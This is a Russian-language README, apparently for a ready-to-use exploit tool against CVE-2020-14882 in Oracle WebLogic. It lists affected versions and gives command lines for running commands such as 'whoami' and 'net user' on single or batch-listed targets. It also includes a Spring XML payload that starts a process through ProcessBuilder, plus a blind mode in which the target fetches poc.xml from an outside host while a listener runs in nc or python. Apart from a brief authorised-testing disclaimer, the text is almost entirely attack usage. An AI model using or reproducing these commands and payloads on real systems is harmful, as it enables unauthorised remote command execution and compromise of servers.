
CVE-2020-14882_ALL — комплексный инструмент эксплуатации уязвимости, поддерживающий обнаружение эха команд, пакетное выполнение команд с эхом, слепое выполнение команд через внешний XML и другие функции.
Комплексный инструмент эксплуатации CVE-2020-14882_ALL с поддержкой обнаружения эхо-вывода команд, массового эхо-вывода команд и выполнения команд без эхо-вывода через внешний xml-файл.
Требуемые модули: requests, http.client
(Инструмент предназначен только для авторизованного тестирования безопасности. Не используйте его в незаконных целях; за нарушения автор ответственности не несёт.)
Известные версии, на которых работает модуль эхо-вывода команд: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
Формат target.txt: http://x.x.x.x:xx, по одному адресу в строке.

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd</value>
</list>
</constructor-arg>
</bean>
</beans>
Запустите прослушивание через python.

Запустите прослушивание через nc.

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

